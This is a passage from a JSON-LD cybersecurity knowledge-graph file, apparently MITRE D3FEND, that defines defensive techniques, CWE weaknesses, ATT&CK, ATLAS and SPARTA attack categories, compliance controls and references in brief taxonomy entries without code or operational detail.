      "d3f:definition": "Characterizing the reputation of mail transfer agents (MTA) to determine the security risk in emails.",
      "d3f:kb-article": "## How it works\nThe sender message transfer agent (MTA) trust rating can be considered an indicator of the level of security risk and/or a trust level associated with sender MTAs in an email header.\n\nThe features considered in determining the trust rating may include:\n\n* Length of time MTA has interacted with the enterprise\n* Number of sender domains sending emails from the MTA\n* Number of recipients in the enterprise the MTA sends emails to\n* Number of emails received from this MTA\n* Number of email replies received from this MTA\n\nFor example, higher values for the length of time an MTA has interacted with the enterprise, or number of emails received from an MTA can result in a higher trust rating. The trust rating categorizes the sender MTA as unrated, neutral, trusted, suspicious, or malicious.\n\n## Considerations\nLegitimate emails from a sender MTA may receive a lower trust rating over time if the sender's domain gets spoofed and is used to send unauthorized emails.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc"
      },
      "rdfs:label": "Sender MTA Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "_:N25050577ee984eaab3b6ce0eff1f8a81"
        }
      ]
    },
    {
      "@id": "_:N25050577ee984eaab3b6ce0eff1f8a81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:Parameter-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBTL",
      "d3f:definition": "The idea behind parameter-based methods is that a well-trained model on the source domain has learned a well-defined structure, and if two tasks are related, this structure can be transferred to the target model.",
      "d3f:kb-article": "## References\nGeorgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).",
      "rdfs:label": "Parameter-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:T1171",
      "@type": "owl:Class",
      "d3f:attack-id": "T1171",
      "d3f:definition": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1557.001",
      "rdfs:label": "LLMNR/NBT-NS Poisoning and Relay",
      "rdfs:seeAlso": {
        "@id": "d3f:T1557.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001262_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors inbound and outbound communications for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001262"
    },
    {
      "@id": "d3f:T1438",
      "@type": "owl:Class",
      "d3f:attack-id": "T1438",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1644",
      "rdfs:label": "Exfiltration Over Other Network Medium - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1644"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Exfiltration Over Other Network Medium"
    },
    {
      "@id": "d3f:CWE-266",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-266",
      "d3f:definition": "A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.",
      "rdfs:label": "Incorrect Privilege Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:LinuxTime",
      "@type": "owl:Class",
      "d3f:definition": "Get time in seconds.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/time.2.html"
      },
      "rdfs:label": "Linux Time",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetSystemTime"
      }
    },
    {
      "@id": "d3f:CWE-1299",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1299",
      "d3f:definition": "The lack of protections on alternate paths to access control-protected assets (such as unprotected shadow registers and other external facing unguarded interfaces) allows an attacker to bypass existing protections to the asset that are only performed against the primary path.",
      "rdfs:label": "Missing Protection Mechanism for Alternate Hardware Interface",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-288"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:DE-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0002",
      "d3f:definition": "Threat actors may target ground-side telemetry reception, processing, or display to disrupt the operator’s visibility into spacecraft health and activity. This may involve denial-based attacks that prevent the spacecraft from transmitting telemetry to the ground (e.g., disabling telemetry links or crashing telemetry software), or more subtle deception-based attacks that manipulate telemetry content to conceal unauthorized actions. Since telemetry is the primary method ground controllers rely on to monitor spacecraft status, any disruption or manipulation can delay or prevent detection of malicious activity, suppress automated or manual mitigations, or degrade trust in telemetry-based decision support systems.",
      "d3f:impairs": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Disrupt or Deceive Downlink - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N8b4a05def17a451a887ba39195861ee7"
        }
      ],
      "skos:prefLabel": "Disrupt or Deceive Downlink"
    },
    {
      "@id": "_:N8b4a05def17a451a887ba39195861ee7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:OTCreateDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that creates data on a remote device.",
      "rdfs:comment": [
        "BACnet: addListElement\nBACnet: createObject",
        "CIP: Insert Member"
      ],
      "rdfs:label": "OT Create Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:T1210",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1210",
      "d3f:definition": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Exploitation of Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N78c59b5b5b3b4ca4a3cc8ad34c6e7291"
        },
        {
          "@id": "_:N10fa1eefa7214ca089c03a09001baafa"
        },
        {
          "@id": "_:N018d3cd069504698b98bb4fafa9e3fcb"
        },
        {
          "@id": "_:Ncadc281585b8496fb339fe43f7a5d754"
        }
      ]
    },
    {
      "@id": "_:N78c59b5b5b3b4ca4a3cc8ad34c6e7291",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N10fa1eefa7214ca089c03a09001baafa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N018d3cd069504698b98bb4fafa9e3fcb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "_:Ncadc281585b8496fb339fe43f7a5d754",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:valid",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date (often a range) of validity of a resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date valid"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-29",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-29",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:DataAcquisitionUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The hardware component which connects to data sources to gather raw, time-stamped data. It often connects to databases or historian gateways for storage and analysis.",
      "d3f:may-contain": {
        "@id": "d3f:DataAcquisitionAgent"
      },
      "rdfs:label": "Data Acquisition Unit",
      "rdfs:seeAlso": {
        "@id": "https://attack.mitre.org/assets/A0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Ne448934573274c62b7a2863d0e6d3055"
        }
      ]
    },
    {
      "@id": "_:Ne448934573274c62b7a2863d0e6d3055",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DataAcquisitionAgent"
      }
    },
    {
      "@id": "d3f:ReadMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:reads": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Read Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N17c2dcd1cefb4528932d0a210df3904f"
        }
      ]
    },
    {
      "@id": "_:N17c2dcd1cefb4528932d0a210df3904f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:CWE-183",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-183",
      "d3f:definition": "The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.",
      "d3f:synonym": [
        "Allowlist / Allow List",
        "Safelist / Safe List",
        "Whitelist / White List"
      ],
      "rdfs:label": "Permissive List of Allowed Inputs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:AML.T0082",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0082",
      "d3f:definition": "Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent.",
      "rdfs:label": "RAG Credential Harvesting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0082"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "RAG Credential Harvesting"
    },
    {
      "@id": "d3f:Reference-LLVMControlFlowIntegrity",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://clang.llvm.org/docs/ControlFlowIntegrity.html"
      },
      "d3f:kb-organization": "clang.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Control Flow Integrity",
      "rdfs:label": "Reference - Clang/LLVM - Control Flow Integrity (CFI)"
    },
    {
      "@id": "d3f:OTSetTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Set timing mechanisms.",
      "rdfs:label": "OT Set Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:MessageAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:DigitalMessage"
      },
      "d3f:d3fend-id": "D3-MAN",
      "d3f:definition": "Authenticating the sender of a message and ensuring message integrity.",
      "d3f:kb-article": "## How it works\n\n### Digital Signature\nDigital signatures are used to verifying a message is from the expected sender. In email, Secure/Multipurpose Internet Mail Extensions (S/MIME) protocol is typically used to digitally sign messages. A hash value of the sender's message is created and encrypted with the sender's private key to create a digital signature. The message and the digital signature are sent to the recipient where the sender's public key is used to decrypt the digital signature and compute the hash of the message. The computed hash is compared with the hash from the received message, and any difference in the hash values signify the message did not originate from the sender and has been alerted in transit.\n\n### Message Authentication Code (MAC)\nMAC is a fixed size string that is appended to a message to provide message authentication and integrity. The sender MAC signing algorithm takes as input a secret symmetric key shared between sender and recipient and the message to calculate a short tag that is appended to the message. The recipient receives the message with the appended tag, and a MAC verification algorithm is run using the symmetric key to verify the message came from the stated sender and ensure the message has not been tampered with.\n\n## Considerations\n- Public keys associated with digital signatures should be verified by a Certification Authority (CA) to prevent impersonation. The CA verifies the owner of a public key and puts the sender's identity and public key into a certificate that is signed by the CA.\n- Digital signatures provide non-repudiation where a third party can verify the authenticity of the message using the sender's digital certificate signed by the CA.\n- Symmetric keys must be exchanged securely via a private channel and management of new symmetric keys are needed for each pair of participants wishing to exchange messages.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF"
        },
        {
          "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1"
        }
      ],
      "rdfs:label": "Message Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageHardening"
        },
        {
          "@id": "_:N2b6e873ad5e2427d8c0204c3dd015587"
        }
      ]
    },
    {
      "@id": "_:N2b6e873ad5e2427d8c0204c3dd015587",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:ExecutableDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutableDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:d3fend-id": "D3-EDL",
      "d3f:definition": "Blocking the execution of files on a host in accordance with defined application policy rules.",
      "d3f:filters": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:kb-article": "## How it works\n\n#### Criteria\n\nA policy-enforcing application can register an application for denylisting based on conditions including the following:\n\n* File attributes\n    * file name\n    * file path\n    * file hash\n    * file publisher, as obtained from the digital signature\n    * permissions of the file\n* File malware scan (eg. Windows SmartScreen)\n* User-File combination\n\nThis may be done to prevent execution of applications which are:\n\n* an old version with known vulnerabilities\n* without a valid license, which could cause legal issues\n* in a directory that is accessible to low-privileged users, that could be accessed by a malware dropper\n* known trojan horse programs\n* too open in their permissions, possibly set to run as a user other than the originator or allowing execution when they should not be\n* a match to the hash of other known malware\n* are detected as undesirable based on a file scan runtime behavior\n\nSystem administrators will customize the rules for the given environment.\n\n#### Backend\n\nThe policy-enforcing program may work by running in kernel mode, and [intercepting] [system calls which execute a process].\n\n## Considerations\n\n* If denylisting is done by filename, filepath, or hash, these mechanisms may be a worthy first line of defense and detection, but could still be evaded by an attacker.\n* Continuous management is needed to keep the denylist up to date, whether it is based on hash, publisher, behavior, or any other digital artifact.\n* Although denylists based on attributes such as file path and virus scan could defend against some threats which they have not been explicitly coded to block, denylists may not provide protection from new, unknown, or zero day attacks.\n\n\n## Examples\nOn a Windows machine the Windows Defender Application Control (WDAC) policy enforcement is run in the kernel and allows for restricting applications.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForIncreasingTheSpeedAtWhichComputerVirusesAreDetected_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-ContentExtractorAndAnalysisSystem_Bit9Inc,CarbonBlackInc"
        }
      ],
      "d3f:synonym": "Executable Blacklisting",
      "rdfs:label": "Executable Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:Ne0805661d0804100825d1df159f8617e"
        },
        {
          "@id": "_:N5cffa015e29e409595a8e6e4b2d1e7ec"
        }
      ]
    },
    {
      "@id": "_:Ne0805661d0804100825d1df159f8617e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N5cffa015e29e409595a8e6e4b2d1e7ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-600",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-600",
      "d3f:definition": "The Servlet does not catch all exceptions, which may reveal sensitive debugging information.",
      "d3f:synonym": "Missing Catch Block",
      "rdfs:label": "Uncaught Exception in Servlet",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-248"
      }
    },
    {
      "@id": "d3f:T1608.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.003",
      "d3f:definition": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)",
      "rdfs:label": "Install Digital Certificate",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:T1554",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1554",
      "d3f:definition": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.",
      "d3f:modifies": {
        "@id": "d3f:ClientApplication"
      },
      "rdfs:label": "Compromise Host Software Binary",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N4234ad58e17b460a9e2b780c2e2d7987"
        }
      ]
    },
    {
      "@id": "_:N4234ad58e17b460a9e2b780c2e2d7987",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ClientApplication"
      }
    },
    {
      "@id": "d3f:BusNetworkFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "d3f:contains": {
        "@id": "d3f:BusMessage"
      },
      "d3f:definition": "A network frame whose layout and timing follow a bus protocol, allowing data to be exchanged across the shared bus medium.",
      "rdfs:label": "Bus Network Frame",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFrame"
        },
        {
          "@id": "_:N37ad1cc9173746bba442b390c678ae5f"
        },
        {
          "@id": "_:N04ec27b3cbdc47a4b21a35d5679ea761"
        }
      ],
      "skos:altLabel": "Bus Frame"
    },
    {
      "@id": "_:N37ad1cc9173746bba442b390c678ae5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "_:N04ec27b3cbdc47a4b21a35d5679ea761",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "d3f:Image-to-ImageTranslationGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ITITG",
      "d3f:definition": "Image-to-image translation is the task of transferring styles and characteristics from one image domain to another.",
      "d3f:kb-article": "## References\nMathWorks. (n.d.). Get Started with GANs for Image-to-Image Translation. [Link](https://www.mathworks.com/help/images/get-started-with-gans-for-image-to-image-translation.html)",
      "rdfs:label": "Image-to-Image Translation GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:Reference-IntroducingFirefoxNewSiteIsolationArchitecture",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://hacks.mozilla.org/2021/05/introducing-firefox-new-site-isolation-security-architecture/"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "Anny Gakhokidze",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Mozilla Foundation",
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Site Isolation Design Document",
      "d3f:release-date": "May 18, 2021",
      "rdfs:label": "Reference - Introducing Firefox's new Site Isolation Architecture"
    },
    {
      "@id": "d3f:OTDiagnosticsMessage",
      "@type": "owl:Class",
      "d3f:definition": "Relay error, exception, alarm, or log information.",
      "rdfs:label": "OT Diagnostics Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:Reference-ONVIF-ProfileS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.onvif.org/profiles/profile-s/"
      },
      "d3f:kb-abstract": "Profile S specifies common interfaces for streaming video, PTZ, and related functions in IP-based video systems.",
      "d3f:kb-author": "ONVIF",
      "d3f:kb-reference-of": {
        "@id": "d3f:VideoSurveillance"
      },
      "d3f:kb-reference-title": "ONVIF Profile S Specification",
      "rdfs:label": "Reference - ONVIF Profile S"
    },
    {
      "@id": "d3f:CCI-002824_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DeadCodeElimination"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        },
        {
          "@id": "d3f:SegmentAddressOffsetRandomization"
        },
        {
          "@id": "d3f:StackFrameCanaryValidation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security safeguards to protect its memory from unauthorized code execution.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-12T00:00:00"
      },
      "rdfs:label": "CCI-002824"
    },
    {
      "@id": "d3f:RD-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002",
      "d3f:definition": "Rather than purchasing or renting assets, adversaries compromise existing infrastructure, mission-owned, third-party, or shared, to obtain ready-made reach into space, ground, or cloud environments with the benefit of plausible attribution. Targets range from physical RF chains and timing sources to mission control servers, automation/scheduling systems, SLE/CSP gateways, identity providers, and cloud data paths. Initial access often comes via stolen credentials, spear-phishing of operators and vendors, exposed remote-support paths, misconfigured multi-tenant platforms, or lateral movement from enterprise IT into operations enclaves. Once resident, actors can pre-position tools, modify configurations, suppress logging, and impersonate legitimate stations or operators to support later Execution, Exfiltration, or Denial.",
      "rdfs:label": "Compromise Infrastructure - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Compromise Infrastructure"
    },
    {
      "@id": "d3f:CWE-1301",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1301",
      "d3f:definition": "The product's data removal process does not completely delete all data and potentially sensitive information within hardware components.",
      "rdfs:label": "Insufficient or Incomplete Data Removal within Hardware Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:T0888",
      "@type": "owl:Class",
      "d3f:attack-id": "T0888",
      "d3f:definition": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage.",
      "rdfs:label": "Remote System Information Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Remote System Information Discovery"
    },
    {
      "@id": "d3f:CWE-1270",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1270",
      "d3f:definition": "The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.",
      "rdfs:label": "Generation of Incorrect Security Tokens",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:AML.TA0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0006",
      "d3f:definition": "The adversary is trying to maintain their foothold via AI artifacts or software.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\nTechniques used for persistence often involve leaving behind modified ML artifacts such as poisoned training data or manipulated AI models.",
      "rdfs:label": "Persistence - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:CCI-000066_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization enforces requirements for remote connections to the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000066"
    },
    {
      "@id": "d3f:CacheMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accessed-by": {
        "@id": "d3f:CentralProcessingUnit"
      },
      "d3f:definition": "Cache memory is temporary storage that is more readily available to the processor than the computer's main memory source, located between the main memory and the processor.  It is typically either integrated directly into the CPU chip (level 1 cache) or placed on a separate chip with a bus interconnect with the CPU (level 2 cache).",
      "d3f:may-contain": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:modifies": {
        "@id": "d3f:CacheMemory"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Processor Cache Memory",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/CPU_cache"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
